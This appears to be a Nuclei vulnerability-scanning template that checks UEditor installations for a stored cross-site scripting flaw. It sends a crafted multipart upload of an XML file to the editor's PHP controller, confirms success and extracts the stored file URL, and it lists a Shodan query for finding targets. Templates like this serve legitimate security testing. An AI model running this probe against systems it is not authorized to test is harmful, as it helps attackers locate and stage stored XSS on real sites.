id: ueditor-xss

info:
  name: ueditor - Cross Site Scripting
  author: pwnhxl
  severity: high
  description: |
    The latest vulnerability version of UEditor, a rich text web editor, allows for XML file uploads which can lead to stored cross-site scripting (XSS) attacks.
  reference:
    - https://blog.csdn.net/weixin_50464560/article/details/124803185
    - https://github.com/fex-team/ueditor/releases/tag/v1.4.3.3
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    max-request: 1
    verified: true
    shodan-query: title:"ueditor"
  tags: ueditor,xss

variables:
  randstring: "{{to_lower(rand_base(16))}}"

http:
  - raw:
      - |
        POST /ueditor/php/controller.php?action=uploadfile HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstring}}

        ------WebKitFormBoundary{{randstring}}
        Content-Disposition: form-data; name="upfile"; filename="test.xml"
        Content-Type: application/vnd.ms-excel

        ------WebKitFormBoundary{{randstring}}--

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'state":"SUCCESS'
          - '.xml","title'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: file_path
        part: body
        group: 1
        regex:
          - 'url":"(.*)","title'